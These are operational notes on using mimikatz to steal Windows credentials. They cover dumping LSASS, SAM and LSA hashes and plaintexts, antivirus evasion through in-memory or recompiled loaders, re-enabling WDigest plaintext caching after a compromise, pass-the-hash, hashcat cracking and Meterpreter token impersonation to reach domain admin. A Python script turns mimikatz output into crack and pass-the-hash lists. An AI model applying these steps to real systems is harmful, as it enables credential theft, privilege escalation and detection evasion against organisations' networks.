mimikatz
- credential dumping tool for Windows: plaintext passwords and NT hashes out of LSASS memory, hashes out of the SAM and LSA
- will be detected by antivirus (the stock binary is signatured), so plan on an in-memory loader, a recompiled build, or an offline LSASS dump instead of dropping mimikatz.exe on disk
installation
- download from https://github.com/gentilkiwi/mimikatz
- or use pypykatz (Python reimplementation; it can parse an LSASS memory dump offline, so mimikatz itself never has to touch the target)
usage
- Invoke-Mimikatz (PowerShell wrapper that loads mimikatz reflectively in memory; same commands, passed via -Command)
- get mimikatz on an owned domain controller (or any host where you are local admin / SYSTEM)
- execute mimikatz (also read the documentation in the mimikatz wiki)
- privilege::debug (requests SeDebugPrivilege so LSASS can be opened; only works from an elevated local admin context)
- sekurlsa::logonpasswords (dumps the credentials of every logon session cached in LSASS)
- NT hashes will be given (the stored NTLM hash, not NetNTLMv2 challenge/responses), so we can use these directly to pass the hash
- also check the wdigest section: plaintext passwords on Windows 7 / Server 2008 R2 and earlier, and on later systems until KB2871997 / Windows 8.1 disabled it
- you might be able to activate it after a compromise: set HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential (DWORD) to 1; only logons that happen after the change are cached in plaintext, so wait for or force a new logon
- lsadump::sam (local SAM hashes of the machine you are on; needs SYSTEM, e.g. via token::elevate; on a DC this is only the DSRM administrator, not the domain accounts)
- lsadump::sam /patch (same, but patches LSASS in memory instead of reading the registry; use when the plain version fails)
- lsadump::lsa /patch → more ntlm hashes (on a DC this is where the domain accounts' NT hashes come from)
- try to crack these (hashcat -m 1000), find out how good their password policy is
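Triage helper for the output of the commands above, added here as an example (not mimikatz's or pypykatz's own code). It parses the text that sekurlsa::logonpasswords, lsadump::sam and lsadump::lsa print, collects one credential per (domain, user), throws out the empty-password NT hash and machine accounts, and emits user:hash lines for hashcat -m 1000 --username plus any wdigest plaintexts. The two sample blobs are constructed to look like mimikatz output and are not real captures; the field names and layout follow what mimikatz prints, the hash values are sample data.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# NT hash of the empty password; accounts showing it carry nothing to pass or crack.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"


@dataclass(frozen=True)
class Credential:
    domain: str
    user: str
    ntlm: str = ""      # NT hash, lowercase hex, "" if not seen
    password: str = ""  # plaintext (wdigest etc.), "" if not seen


# Field lines as mimikatz prints them; the same regexes cover
#   sekurlsa::logonpasswords  "* Username : alice" / "* Domain : CORP" / "* NTLM : <hex>" / "* Password : ..."
#   lsadump::sam              "Domain : WS01" / "User : Administrator" / "Hash NTLM: <hex>"
#   lsadump::lsa /patch       "Domain : CORP / S-1-5-21-..." / "User : alice" / "NTLM : <hex>"
RE_DOMAIN = re.compile(r"^\s*\*?\s*Domain\s*:\s*(.+?)\s*$", re.I)
RE_USER = re.compile(r"^\s*\*?\s*User(?:\s*name)?\s*:\s*(.+?)\s*$", re.I)
RE_NTLM = re.compile(r"^\s*\*?\s*(?:Hash\s+)?NTLM\s*:\s*([0-9a-f]{32})\s*$", re.I)
RE_PASSWORD = re.compile(r"^\s*\*\s*Password\s*:\s*(.+?)\s*$", re.I)


def parse_mimikatz(text: str) -> list[Credential]:
    """Walk the output line by line, tracking the current domain/user context,
    and collect one Credential per (domain, user) that has a hash or plaintext."""
    found: dict[tuple[str, str], dict[str, str]] = {}
    domain = user = ""
    for line in text.splitlines():
        if m := RE_DOMAIN.match(line):
            domain = m.group(1).split(" / ")[0].upper()  # lsadump::lsa appends the SID
        elif m := RE_USER.match(line):
            user = "" if m.group(1) == "(null)" else m.group(1)
        elif (m := RE_NTLM.match(line)) and user:
            found.setdefault((domain, user), {})["ntlm"] = m.group(1).lower()
        elif (m := RE_PASSWORD.match(line)) and user and m.group(1) != "(null)":
            found.setdefault((domain, user), {})["password"] = m.group(1)
    return [Credential(d, u, v.get("ntlm", ""), v.get("password", ""))
            for (d, u), v in found.items()]


def pth_candidates(creds: list[Credential]) -> list[Credential]:
    """User accounts with a real NT hash. Machine accounts ($) are dropped: their
    passwords are long random strings that will not crack in this workflow."""
    return [c for c in creds
            if c.ntlm and c.ntlm != EMPTY_NT_HASH and not c.user.endswith("$")]


def hashcat_lines(creds: list[Credential]) -> list[str]:
    """user:hash lines for `hashcat -m 1000 --username`."""
    return [f"{c.user}:{c.ntlm}" for c in pth_candidates(creds)]


def plaintexts(creds: list[Credential]) -> list[tuple[str, str]]:
    """DOMAIN\\user -> plaintext pairs (what wdigest hands you on old boxes)."""
    return [(f"{c.domain}\\{c.user}", c.password) for c in creds if c.password]


# Constructed sample in the shape of sekurlsa::logonpasswords (not a real capture):
# one interactive user on a box with wdigest on, one machine account with the empty hash.
SAMPLE_LOGONPASSWORDS = """
Authentication Id : 0 ; 4711 (00000000:00001267)
Session           : Interactive from 1
User Name         : alice
Domain            : CORP
        msv :
         [00000003] Primary
         * Username   : alice
         * Domain     : CORP
         * NTLM       : 0cb6948805f797bf2a82807973b89537
        wdigest :
         * Username   : alice
         * Domain     : CORP
         * Password   : Summer2020!
        kerberos :
         * Username   : alice
         * Domain     : CORP.LOCAL
         * Password   : (null)

Authentication Id : 0 ; 996 (00000000:000003e4)
User Name         : WS01$
Domain            : CORP
        msv :
         [00000003] Primary
         * Username   : WS01$
         * Domain     : CORP
         * NTLM       : 31d6cfe0d16ae931b73c59d7e0c089c0
"""

# Constructed sample in the shape of lsadump::sam (local SAM of WS01); Guest has no hash line.
SAMPLE_SAM = """
Domain : WS01
SysKey : 1a2b3c4d5e6f708192a3b4c5d6e7f809

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 8846f7eaee8fb117ad06bdd830b7586c

RID  : 000001f5 (501)
User : Guest
"""

if __name__ == "__main__":
    for label, blob in (("logonpasswords", SAMPLE_LOGONPASSWORDS), ("sam", SAMPLE_SAM)):
        creds = parse_mimikatz(blob)
        print(f"== {label}: {len(creds)} credential(s)")
        for line in hashcat_lines(creds):
            print("crack/pth:", line)
        for who, pw in plaintexts(creds):
            print("plaintext:", who, pw)
```

Feed it the saved console output (or `log` file) of a mimikatz session; the Guest account and the WS01$ machine account show how entries without a usable hash are dropped rather than padded into the crack list.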
dump stuff (when domain admin)
- must be domain admin to dump the domain's hashes from a DC (lsadump::lsa); sekurlsa::logonpasswords on a member host only needs local admin on that host
Hint: can use incognito (token impersonation in meterpreter: load incognito, list_tokens -u, impersonate_token DOMAIN\\admin) to step up to a domain admin account whose token is present on the box